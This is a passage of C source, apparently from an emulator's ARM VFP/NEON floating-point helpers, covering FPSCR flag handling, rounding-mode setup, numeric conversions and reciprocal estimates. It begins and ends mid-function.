0x10; } if (host_bits & float_flag_input_denormal) { target_bits |= 0x80; } return target_bits; } /* Convert vfp exception flags to target form. */ static inline int vfp_exceptbits_to_host(int target_bits) { int host_bits = 0; if (target_bits & 1) { host_bits |= float_flag_invalid; } if (target_bits & 2) { host_bits |= float_flag_divbyzero; } if (target_bits & 4) { host_bits |= float_flag_overflow; } if (target_bits & 8) { host_bits |= float_flag_underflow; } if (target_bits & 0x10) { host_bits |= float_flag_inexact; } if (target_bits & 0x80) { host_bits |= float_flag_input_denormal; } return host_bits; } static uint32_t vfp_get_fpscr_from_host(CPUARMState *env) { uint32_t i; i = get_float_exception_flags(&env->vfp.fp_status); i |= get_float_exception_flags(&env->vfp.standard_fp_status); /* FZ16 does not generate an input denormal exception. */ i |= (get_float_exception_flags(&env->vfp.fp_status_f16) & ~float_flag_input_denormal); return vfp_exceptbits_from_host(i); } static void vfp_set_fpscr_to_host(CPUARMState *env, uint32_t val) { int i; uint32_t changed = env->vfp.xregs[ARM_VFP_FPSCR]; changed ^= val; if (changed & (3 << 22)) { i = (val >> 22) & 3; switch (i) { case FPROUNDING_TIEEVEN: i = float_round_nearest_even; break; case FPROUNDING_POSINF: i = float_round_up; break; case FPROUNDING_NEGINF: i = float_round_down; break; case FPROUNDING_ZERO: i = float_round_to_zero; break; } set_float_rounding_mode(i, &env->vfp.fp_status); set_float_rounding_mode(i, &env->vfp.fp_status_f16); } if (changed & FPCR_FZ16) { bool ftz_enabled = val & FPCR_FZ16; set_flush_to_zero(ftz_enabled, &env->vfp.fp_status_f16); set_flush_inputs_to_zero(ftz_enabled, &env->vfp.fp_status_f16); } if (changed & FPCR_FZ) { bool ftz_enabled = val & FPCR_FZ; set_flush_to_zero(ftz_enabled, &env->vfp.fp_status); set_flush_inputs_to_zero(ftz_enabled, &env->vfp.fp_status); } if (changed & FPCR_DN) { bool dnan_enabled = val & FPCR_DN; set_default_nan_mode(dnan_enabled, &env->vfp.fp_status); set_default_nan_mode(dnan_enabled, &env->vfp.fp_status_f16); } /* * The exception flags are ORed together when we read fpscr so we * only need to preserve the current state in one of our * float_status values. */ i = vfp_exceptbits_to_host(val); set_float_exception_flags(i, &env->vfp.fp_status); set_float_exception_flags(0, &env->vfp.fp_status_f16); set_float_exception_flags(0, &env->vfp.standard_fp_status); } uint32_t HELPER(vfp_get_fpscr)(CPUARMState *env) { uint32_t i, fpscr; fpscr = env->vfp.xregs[ARM_VFP_FPSCR] | (env->vfp.vec_len << 16) | (env->vfp.vec_stride << 20); fpscr |= vfp_get_fpscr_from_host(env); i = env->vfp.qc[0] | env->vfp.qc[1] | env->vfp.qc[2] | env->vfp.qc[3]; fpscr |= i ? FPCR_QC : 0; return fpscr; } uint32_t vfp_get_fpscr(CPUARMState *env) { return HELPER(vfp_get_fpscr)(env); } void HELPER(vfp_set_fpscr)(CPUARMState *env, uint32_t val) { /* When ARMv8.2-FP16 is not supported, FZ16 is RES0. */ if (!cpu_isar_feature(any_fp16, env_archcpu(env))) { val &= ~FPCR_FZ16; } if (arm_feature(env, ARM_FEATURE_M)) { /* * M profile FPSCR is RES0 for the QC, STRIDE, FZ16, LEN bits * and also for the trapped-exception-handling bits IxE. */ val &= 0xf7c0009f; } vfp_set_fpscr_to_host(env, val); /* * We don't implement trapped exception handling, so the * trap enable bits, IDE|IXE|UFE|OFE|DZE|IOE are all RAZ/WI (not RES0!) * * If we exclude the exception flags, IOC|DZC|OFC|UFC|IXC|IDC * (which are stored in fp_status), and the other RES0 bits * in between, then we clear all of the low 16 bits. */ env->vfp.xregs[ARM_VFP_FPSCR] = val & 0xf7c80000; env->vfp.vec_len = (val >> 16) & 7; env->vfp.vec_stride = (val >> 20) & 3; /* * The bit we set within fpscr_q is arbitrary; the register as a * whole being zero/non-zero is what counts. */ env->vfp.qc[0] = val & FPCR_QC; env->vfp.qc[1] = 0; env->vfp.qc[2] = 0; env->vfp.qc[3] = 0; } void vfp_set_fpscr(CPUARMState *env, uint32_t val) { HELPER(vfp_set_fpscr)(env, val); } #define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p)) #define VFP_BINOP(name) \ float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float32_ ## name(a, b, fpst); \ } \ float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float64_ ## name(a, b, fpst); \ } VFP_BINOP(add) VFP_BINOP(sub) VFP_BINOP(mul) VFP_BINOP(div) VFP_BINOP(min) VFP_BINOP(max) VFP_BINOP(minnum) VFP_BINOP(maxnum) #undef VFP_BINOP float32 VFP_HELPER(neg, s)(float32 a) { return float32_chs(a); } float64 VFP_HELPER(neg, d)(float64 a) { return float64_chs(a); } float32 VFP_HELPER(abs, s)(float32 a) { return float32_abs(a); } float64 VFP_HELPER(abs, d)(float64 a) { return float64_abs(a); } float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env) { return float32_sqrt(a, &env->vfp.fp_status); } float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env) { return float64_sqrt(a, &env->vfp.fp_status); } static void softfloat_to_vfp_compare(CPUARMState *env, int cmp) { uint32_t flags = 0; switch (cmp) { case float_relation_equal: flags = 0x6; break; case float_relation_less: flags = 0x8; break; case float_relation_greater: flags = 0x2; break; case float_relation_unordered: flags = 0x3; break; default: g_assert_not_reached(); break; } env->vfp.xregs[ARM_VFP_FPSCR] = deposit32(env->vfp.xregs[ARM_VFP_FPSCR], 28, 4, flags); } /* XXX: check quiet/signaling case */ #define DO_VFP_cmp(p, type) \ void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env) \ { \ softfloat_to_vfp_compare(env, \ type ## _compare_quiet(a, b, &env->vfp.fp_status)); \ } \ void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \ { \ softfloat_to_vfp_compare(env, \ type ## _compare(a, b, &env->vfp.fp_status)); \ } DO_VFP_cmp(s, float32) DO_VFP_cmp(d, float64) #undef DO_VFP_cmp /* Integer to float and float to integer conversions */ #define CONV_ITOF(name, ftype, fsz, sign) \ ftype HELPER(name)(uint32_t x, void *fpstp) \ { \ float_status *fpst = fpstp; \ return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \ } #define CONV_FTOI(name, ftype, fsz, sign, round) \ sign##int32_t HELPER(name)(ftype x, void *fpstp) \ { \ float_status *fpst = fpstp; \ if (float##fsz##_is_any_nan(x)) { \ float_raise(float_flag_invalid, fpst); \ return 0; \ } \ return float##fsz##_to_##sign##int32##round(x, fpst); \ } #define FLOAT_CONVS(name, p, ftype, fsz, sign) \ CONV_ITOF(vfp_##name##to##p, ftype, fsz, sign) \ CONV_FTOI(vfp_to##name##p, ftype, fsz, sign, ) \ CONV_FTOI(vfp_to##name##z##p, ftype, fsz, sign, _round_to_zero) FLOAT_CONVS(si, h, uint32_t, 16, ) FLOAT_CONVS(si, s, float32, 32, ) FLOAT_CONVS(si, d, float64, 64, ) FLOAT_CONVS(ui, h, uint32_t, 16, u) FLOAT_CONVS(ui, s, float32, 32, u) FLOAT_CONVS(ui, d, float64, 64, u) #undef CONV_ITOF #undef CONV_FTOI #undef FLOAT_CONVS /* floating point conversion */ float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env) { return float32_to_float64(x, &env->vfp.fp_status); } float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env) { return float64_to_float32(x, &env->vfp.fp_status); } /* VFP3 fixed point conversion. */ #ifdef _MSC_VER #define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t x, uint32_t shift, \ void *fpstp) \ { return itype##_to_##float##fsz##_scalbn(x, 0 - shift, fpstp); } #else #define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t x, uint32_t shift, \ void *fpstp) \ { return itype##_to_##float##fsz##_scalbn(x, -shift, fpstp); } #endif #define VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, ROUND, suff) \ uint##isz##_t HELPER(vfp_to##name##p##suff)(float##fsz x, uint32_t shift, \ void *fpst) \ { \ if (unlikely(float##fsz##_is_any_nan(x))) { \ float_raise(float_flag_invalid, fpst); \ return 0; \ } \ return float##fsz##_to_##itype##_scalbn(x, ROUND, shift, fpst); \ } #define VFP_CONV_FIX(name, p, fsz, isz, itype) \ VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ float_round_to_zero, _round_to_zero) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ get_float_rounding_mode(fpst), ) #define VFP_CONV_FIX_A64(name, p, fsz, isz, itype) \ VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ get_float_rounding_mode(fpst), ) VFP_CONV_FIX(sh, d, 64, 64, int16) VFP_CONV_FIX(sl, d, 64, 64, int32) VFP_CONV_FIX_A64(sq, d, 64, 64, int64) VFP_CONV_FIX(uh, d, 64, 64, uint16) VFP_CONV_FIX(ul, d, 64, 64, uint32) VFP_CONV_FIX_A64(uq, d, 64, 64, uint64) VFP_CONV_FIX(sh, s, 32, 32, int16) VFP_CONV_FIX(sl, s, 32, 32, int32) VFP_CONV_FIX_A64(sq, s, 32, 64, int64) VFP_CONV_FIX(uh, s, 32, 32, uint16) VFP_CONV_FIX(ul, s, 32, 32, uint32) VFP_CONV_FIX_A64(uq, s, 32, 64, uint64) #undef VFP_CONV_FIX #undef VFP_CONV_FIX_FLOAT #undef VFP_CONV_FLOAT_FIX_ROUND #undef VFP_CONV_FIX_A64 uint32_t HELPER(vfp_sltoh)(uint32_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return int32_to_float16_scalbn(x, 0 - shift, fpst); #else return int32_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_ultoh)(uint32_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return uint32_to_float16_scalbn(x, 0 - shift, fpst); #else return uint32_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_sqtoh)(uint64_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return int64_to_float16_scalbn(x, 0 - shift, fpst); #else return int64_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_uqtoh)(uint64_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return uint64_to_float16_scalbn(x, 0 - shift, fpst); #else return uint64_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_toshh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int16_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_touhh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint16_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_toslh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int32_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_toulh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint32_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint64_t HELPER(vfp_tosqh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int64_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint64_t HELPER(vfp_touqh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint64_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } /* Set the current fp rounding mode and return the old one. * The argument is a softfloat float_round_ value. */ uint32_t HELPER(set_rmode)(uint32_t rmode, void *fpstp) { float_status *fp_status = fpstp; uint32_t prev_rmode = get_float_rounding_mode(fp_status); set_float_rounding_mode(rmode, fp_status); return prev_rmode; } /* Set the current fp rounding mode in the standard fp status and return * the old one. This is for NEON instructions that need to change the * rounding mode but wish to use the standard FPSCR values for everything * else. Always set the rounding mode back to the correct value after * modifying it. * The argument is a softfloat float_round_ value. */ uint32_t HELPER(set_neon_rmode)(uint32_t rmode, CPUARMState *env) { float_status *fp_status = &env->vfp.standard_fp_status; uint32_t prev_rmode = get_float_rounding_mode(fp_status); set_float_rounding_mode(rmode, fp_status); return prev_rmode; } /* Half precision conversions. */ float32 HELPER(vfp_fcvt_f16_to_f32)(uint32_t a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing input denormals. */ float_status *fpst = fpstp; flag save = get_flush_inputs_to_zero(fpst); set_flush_inputs_to_zero(false, fpst); float32 r = float16_to_float32(a, !ahp_mode, fpst); set_flush_inputs_to_zero(save, fpst); return r; } uint32_t HELPER(vfp_fcvt_f32_to_f16)(float32 a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing output denormals. */ float_status *fpst = fpstp; flag save = get_flush_to_zero(fpst); set_flush_to_zero(false, fpst); float16 r = float32_to_float16(a, !ahp_mode, fpst); set_flush_to_zero(save, fpst); return r; } float64 HELPER(vfp_fcvt_f16_to_f64)(uint32_t a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing input denormals. */ float_status *fpst = fpstp; flag save = get_flush_inputs_to_zero(fpst); set_flush_inputs_to_zero(false, fpst); float64 r = float16_to_float64(a, !ahp_mode, fpst); set_flush_inputs_to_zero(save, fpst); return r; } uint32_t HELPER(vfp_fcvt_f64_to_f16)(float64 a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing output denormals. */ float_status *fpst = fpstp; flag save = get_flush_to_zero(fpst); set_flush_to_zero(false, fpst); float16 r = float64_to_float16(a, !ahp_mode, fpst); set_flush_to_zero(save, fpst); return r; } #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_one_point_five make_float32(0x3fc00000) float32 HELPER(recps_f32)(float32 a, float32 b, CPUARMState *env) { float_status *s = &env->vfp.standard_fp_status; if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { if (!(float32_is_zero(a) || float32_is_zero(b))) { float_raise(float_flag_input_denormal, s); } return float32_two; } return float32_sub(float32_two, float32_mul(a, b, s), s); } float32 HELPER(rsqrts_f32)(float32 a, float32 b, CPUARMState *env) { float_status *s = &env->vfp.standard_fp_status; float32 product; if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { if (!(float32_is_zero(a) || float32_is_zero(b))) { float_raise(float_flag_input_denormal, s); } return float32_one_point_five; } product = float32_mul(a, b, s); return float32_div(float32_sub(float32_three, product, s), float32_two, s); } /* NEON helpers. */ /* Constants 256 and 512 are used in some helpers; we avoid relying on * int->float conversions at run-time. */ #define float64_256 make_float64(0x4070000000000000LL) #define float64_512 make_float64(0x4080000000000000LL) #define float16_maxnorm make_float16(0x7bff) #define float32_maxnorm make_float32(0x7f7fffff) #define float64_maxnorm make_float64(0x7fefffffffffffffLL) /* Reciprocal functions * * The algorithm that must be used to calculate the estimate * is specified by the ARM ARM, see FPRecipEstimate()/RecipEstimate */ /* See RecipEstimate() * * input is a 9 bit fixed point number * input range 256 .. 511 for a number from 0.5 <= x < 1.0. * result range 256 .. 511 for a number from 1.0 to 511/256. */ static int recip_estimate(int input) { int a, b, r; assert(256 <= input && input < 512); a = (input * 2) + 1; b = (1 << 19) / a; r = (b + 1) >> 1; assert(256 <= r && r < 512); return r; } /* * Common wrapper to call recip_estimate * * The parameters are exponent and 64 bit fraction (without implicit * bit) where the binary point is nominally at bit 52. Returns a * float64 which can then be rounded to the appropriate size by the * callee. */ static uint64_t call_recip_estimate(int *exp, int exp_off, uint64_t frac) { uint32_t scaled, estimate; uint64_t result_frac; int result_exp; /* Handle sub-normals */ if (*exp == 0) { if (extract64(frac, 51, 1) == 0) { *exp = -1; frac <<= 2; } else { frac <<= 1; } } /* scaled = UInt('1':fraction<51:44>) */ scaled = deposit32(1 << 8, 0, 8, extract64(frac, 44, 8)); estimate = recip_estimate(scaled); result_exp = exp_off - *exp; result_frac = deposit64(0, 44, 8, estimate); if (result_exp == 0) { result_frac = deposit64(result_frac >> 1, 51, 1, 1); } else if (result_exp == -1) { result_frac = deposit64(result_frac >> 2, 50, 2, 1); result_exp = 0; } *exp = result_exp; return result_frac; } static bool round_to_inf(float_status *fpst, bool sign_bit) { switch (fpst->float_rounding_mode) { case float_round_nearest_even: /* Round to Nearest */ return true; case float_round_up: /* Round to +Inf */ return !sign_bit; case float_round_down: /* Round to -Inf */ return sign_bit; case float_round_to_zero: /* Round to Zero */ return false; } g_assert_not_reached(); // never reach here return false; } uint32_t HELPER(recpe_f16)(uint32_t input, void *fpstp) { float_status *fpst = fpstp; float16 f16 = float16_squash_input_denormal(input, fpst); uint32_t f16_val = float16_val(f16); uint32_t f16_sign = float16_is_neg(f16); int f16_exp = extract32(f16_val, 10, 5); uint32_t f16_frac = extract32(f16_val, 0, 10); uint64_t f64_frac; if (float16_is_any_nan(f16)) { float16 nan = f16; if (float16_is_signaling_nan(f16, fpst)) { float_raise(float_flag_invalid, fpst); nan = float16_silence_nan(f16, fpst); } if (fpst->default_nan_mode) { nan = float16_default_nan(fpst); } return nan; } else if (float16_is_infinity(f16)) { return float16_set_sign(float16_zero, float16_is_neg(f16)); } else if (float16_is_zero(f16)) { float_raise(float_flag_divbyzero, fpst); return float16_set_sign(float16_infinity, float16_is_neg(f16)); } else if (float16_abs(f16) < (1 << 8)) { /* Abs(value) < 2.0^-16 */ float_raise(float_flag_overflow | float_flag_inexact, fpst); if (round_to_inf(fpst, f16_sign)) { return float16_set_sign(float16_infinity, f16_sign); } else { return float16_set_sign(float16_maxnorm, f16_sign); } } else if (f16_exp >= 29 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float16_set_sign(float16_zero, float16_is_neg(f16)); } f64_frac = call_recip_estimate(&f16_exp, 29, ((uint64_t) f16_frac) << (52 - 10)); /* result = sign : result_exp<4:0> : fraction<51:42> */ f16_val = deposit32(0, 15, 1, f16_sign); f16_val = deposit32(f16_val, 10, 5, f16_exp); f16_val = deposit32(f16_val, 0, 10, extract64(f64_frac, 52 - 10, 10)); return make_float16(f16_val); } float32 HELPER(recpe_f32)(float32 input, void *fpstp) { float_status *fpst = fpstp; float32 f32 = float32_squash_input_denormal(input, fpst); uint32_t f32_val = float32_val(f32); bool f32_sign = float32_is_neg(f32); int f32_exp = extract32(f32_val, 23, 8); uint32_t f32_frac = extract32(f32_val, 0, 23); uint64_t f64_frac; if (float32_is_any_nan(f32)) { float32 nan = f32; if (float32_is_signaling_nan(f32, fpst)) { float_raise(float_flag_invalid, fpst); nan = float32_silence_nan(f32, fpst); } if (fpst->default_nan_mode) { nan = float32_default_nan(fpst); } return nan; } else if (float32_is_infinity(f32)) { return float32_set_sign(float32_zero, float32_is_neg(f32)); } else if (float32_is_zero(f32)) { float_raise(float_flag_divbyzero, fpst); return float32_set_sign(float32_infinity, float32_is_neg(f32)); } else if (float32_abs(f32) < (1ULL << 21)) { /* Abs(value) < 2.0^-128 */ float_raise(float_flag_overflow | float_flag_inexact, fpst); if (round_to_inf(fpst, f32_sign)) { return float32_set_sign(float32_infinity, f32_sign); } else { return float32_set_sign(float32_maxnorm, f32_sign); } } else if (f32_exp >= 253 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float32_set_sign(float32_zero, float32_is_neg(f32)); } f64_frac = call_recip_estimate(&f32_exp, 253, ((uint64_t) f32_frac) << (52 - 23)); /* result = sign : result_exp<7:0> : fraction<51:29> */ f32_val = deposit32(0, 31, 1, f32_sign); f32_val = deposit32(f32_val, 23, 8, f32_exp); f32_val = deposit32(f32_val, 0, 23, extract64(f64_frac, 52 - 23, 23)); return make_float32(f32_val); } float64 HELPER(recpe_f64)(float64 input, void *fpstp) { float_status *fpst = fpstp; float64 f64 = float64_squash_input_denormal(input, fpst); uint64_t f64_val = float64_val(f64); bool f64_sign = float64_is_neg(f64); int f64_exp = extract64(f64_val, 52, 11); uint64_t f64_frac = extract64(f64_val, 0, 52); /* Deal with any special cases */ if (float64_is_any_nan(f64)) { float64 nan = f64; if (float64_is_signaling_nan(f64, fpst)) { float_raise(float_flag_invalid, fpst); nan = float64_silence_nan(f64, fpst); } if (fpst->default_nan_mode) { nan = float64_default_nan(fpst); } return nan; } else if (float64_is_infinity(f64)) { return float64_set_sign(float64_zero, float64_is_neg(f64)); } else if (float64_is_zero(f64)) { float_raise(float_flag_divbyzero, fpst); return float64_set_sign(float64_infinity, float64_is_neg(f64)); } else if ((f64_val & ~(1ULL << 63)) < (1ULL << 50)) { /* Abs(value) < 2.0^-1024 */ float_raise(float_flag_overflow | float_flag_inexact, fpst); if (round_to_inf(fpst, f64_sign)) { return float64_set_sign(float64_infinity, f64_sign); } else { return float64_set_sign(float64_maxnorm, f64_sign); } } else if (f64_exp >= 2045 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float64_set_sign(float64_zero, float64_is_neg(f64)); } f64_frac = call_recip_estimate(&f64_exp, 2045, f64_frac); /* result = sign : result_exp<10:0> : fraction<51:0>; */ f64_val = deposit64(0, 63, 1, f64_sign); f64_val = deposit64(f64_val, 52, 11, f64_exp); f64_val = deposit64(f64_val, 0, 52, f64_frac); return make_float64(f64_val); } /* The algorithm that must be used to calculate the estimate * is specified by the ARM ARM. */ static int do_recip_sqrt_estimate(int a) { int b, estimate; assert(128 <= a && a < 512); if (a < 256) { a = a * 2 + 1; } else { a = (a >> 1) << 1; a = (a + 1) * 2; } b = 512; while (a * (b + 1) * (b + 1) < (1 << 28)) { b += 1; } estimate = (b + 1) / 2; assert(256 <= estimate && estimate < 512); return estimate; } static uint64_t recip_sqrt_estimate(int *exp , int exp_off, uint64_t frac) { int estimate; uint32_t scaled; if (*exp == 0) { while (extract64(frac, 51, 1) == 0) { frac = frac << 1; *exp -= 1; } frac = extract64(frac, 0, 51) << 1; } if (*exp & 1) { /* scaled = UInt('01':fraction<51:45>) */ scaled = deposit32(1 << 7, 0, 7, extract64(frac, 45, 7)); } else { /* scaled = UInt('1':fraction<51:44>) */ scaled = deposit32(1 << 8, 0, 8, extract64(frac, 44, 8)); } estimate = do_recip_sqrt_estimate(scaled); *exp = (exp_off - *exp) / 2; return extract64(estimate, 0, 8) << 44; } uint32_t HELPER(rsqrte_f16)(uint32_t input, void *fpstp) { float_status *s = fpstp; float16 f16 = float16_squash_input_denormal(input, s); uint16_t val = float16_val(f16); bool f16_sign = float16_is_neg(f16); int f16_exp = extract32(val, 10, 5); uint16_t f16_frac = extract32(val, 0, 10); uint64_t f64_frac; if (float16_is_any_nan(f16)) { float16 nan = f16; if (float16_is_signaling_nan(f16, s)) { float_raise(float_flag_invalid, s); nan = float16_silence_nan(f16, s); } if (s->default_nan_mode) { nan = float16_default_nan(s); } return nan; } else if (float16_is_zero(f16)) { float_raise(float_flag_divbyzero, s); return float16_set_sign(float16_infinity, f16_sign); } else if (f16_sign) { float_raise(float_flag_invalid, s); return float16_default_nan(s); } else if (float16_is_infinity(f16)) { return float16_zero; } /* Scale and normalize to a double-precision value between 0.25 and 1.0, * preserving the parity of the exponent. */ f64_frac = ((uint64_t) f16_frac) << (52 - 10); f64_frac = recip_sqrt_estimate(&f16_exp, 44, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(2) */ val = deposit32(0, 15, 1, f16_sign); val = deposit32(val, 10, 5, f16_exp); val = deposit32(val, 2, 8, extract64(f64_frac, 52 - 8, 8)); return make_float16(val); } float32 HELPER(rsqrte_f32)(float32 input, void *fpstp) { float_status *s = fpstp; float32 f32 = float32_squash_input_denormal(input, s); uint32_t val = float32_val(f32); uint32_t f32_sign = float32_is_neg(f32); int f32_exp = extract32(val, 23, 8); uint32_t f32_frac = extract32(val, 0, 23); uint64_t f64_frac; if (float32_is_any_nan(f32)) { float32 nan = f32; if (float32_is_signaling_nan(f32, s)) { float_raise(float_flag_invalid, s); nan = float32_silence_nan(f32, s); } if (s->default_nan_mode) { nan = float32_default_nan(s); } return nan; } else if (float32_is_zero(f32)) { float_raise(float_flag_divbyzero, s); return float32_set_sign(float32_infinity, float32_is_neg(f32)); } else if (float32_is_neg(f32)) { float_raise(float_flag_invalid, s); return float32_default_nan(s); } else if (float32_is_infinity(f32)) { return float32_zero; } /* Scale and normalize to a double-precision value between 0.25 and 1.0, * preserving the parity of the exponent. */ f64_frac = ((uint64_t) f32_frac) << 29; f64_frac = recip_sqrt_estimate(&f32_exp, 380, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(15) */ val = deposit32(0, 31, 1, f32_sign); val = deposit32(val, 23, 8, f32_exp); val = deposit32(val, 15, 8, extract64(f64_frac, 52 - 8, 8)); return make_float32(val); } float64 HELPER(rsqrte_f64)(float64 input, void *fpstp) { float_status *s = fpstp; float64 f64 = float64_squash_input_denormal(input, s); uint64_t val = float64_val(f64); bool f64_sign = float64_is_neg(f64); int f64_exp = extract64(val, 52, 11); uint64_t f64_frac = extract64(val, 0, 52); if (float64_is_any_nan(f64)) { float64 nan = f64; if (float64_is_signaling_nan(f64, s)) { float_raise(float_flag_invalid, s); nan = float64_silence_nan(f64, s); } if (s->default_nan_mode) { nan = float64_default_nan(s); } return nan; } else if (float64_is_zero(f64)) { float_raise(float_flag_divbyzero, s); return float64_set_sign(float64_infinity, float64_is_neg(f64)); } else if (float64_is_neg(f64)) { float_raise(float_flag_invalid, s); return float64_default_nan(s); } else if (float64_is_infinity(f64)) { return float64_zero; } f64_frac = recip_sqrt_estimate(&f64_exp, 3068, f64_frac); /* result = sign : result_exp<4:0> : estimate<7:0> : Zeros(44) */ val = deposit64(0, 61, 1, f64_sign); val = deposit64(val, 52, 11, f64_exp); val = deposit64(val, 44, 8, extract64(f64_frac, 52 - 8, 8)); return make_float64(val); } uint32_t HELPER(recpe_u32)(uint32_t a, void *fpstp) { /* float_status *s = fpstp; */ int input, estimate; if ((a & 0x80000000) == 0) { return 0xffffffff; } input = extract32(a, 23, 9); estimate = recip_estimate(input); return deposit32(0, (32 - 9), 9, estimate); } uint32_t HELPER(rsqrte_u32)(uint32_t a, void *fpstp) { int estimate; if ((a & 0xc0000000) == 0) { return 0xffffffff; } estimate = do_recip_sqrt_estimate(extract32(a, 23, 9)); return deposit32(0, 23, 9, estimate); } /* VFPv4 fused multiply-accumulate */ float32 VFP_HELPER(muladd, s)(float32 a, float32 b, float32 c, void *fpstp) { float_status *fpst = fpstp; return float32_muladd(a, b, c, 0, fpst); } float64 VFP_HELPER(muladd, d)(float64 a, float64 b, float64 c, void *fpstp) { float_status *fpst = fpstp; return float64_muladd(a, b, c, 0, fpst); } /* ARMv8 round to integral */ float32 HELPER(rints_exact)(float32 x, void *fp_status) { return float32_round_to_int(x, fp_status); } float64 HELPER(rintd_exact)(float64 x, void *fp_status) { return float64_round_to_int(x, fp_status); } float32 HELPER(rints)(float32 x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float32 ret; ret = float32_round_to_int(x, fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } float64 HELPER(rintd)(float64 x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float64 ret; ret = float64_round_to_int(x, fp_status); new_flags = get_float_exception_flags(fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } /* Convert ARM rounding mode to softfloat */ int arm_rmode_to_sf(int rmode) { switch (rmode) { case FPROUNDING_TIEAWAY: rmode = float_round_ties_away; break; case FPROUNDING_ODD: /* FIXME: add support for TIEAWAY and ODD */ qemu_log_mask(LOG_UNIMP, "arm: unimplemented rounding mode: %d\n", rmode); /* fall through for now */ case FPROUNDING_TIEEVEN: default: rmode = float_round_nearest_even; break; case FPROUNDING_POSINF: rmode = float_round_up; break; case FPROUNDING_NEGINF: rmode = float_round_down; break; case FPROUNDING_ZERO: rmode = float_round_to_zero; break; } return rmode; } /* * Implement float64 to int32_t conversion without saturation; * the result is supplied modulo 2^32. */ uint64_t HELPER(fjcvtzs)(float64 value, void *vstatus) { float_status *status = vstatus; uint32_t exp, sign; uint64_t frac; uint32_t inexact = 1; /* !Z */ sign = extract64(value, 63, 1); exp = extract64(value, 52, 11); frac = extract64(value, 0, 52); if (exp == 0) { /* While not inexact for IEEE FP, -0.0 is inexact for JavaScript. */ inexact = sign; if (frac != 0) { if (status->flush_inputs_to_zero) { float_raise(float_flag_input_denormal, status); } else { float_raise(float_flag_inexact, status); inexact = 1; } } frac = 0; } else if (exp == 0x7ff) { /* This operation raises Invalid for both NaN and overflow (Inf). */ 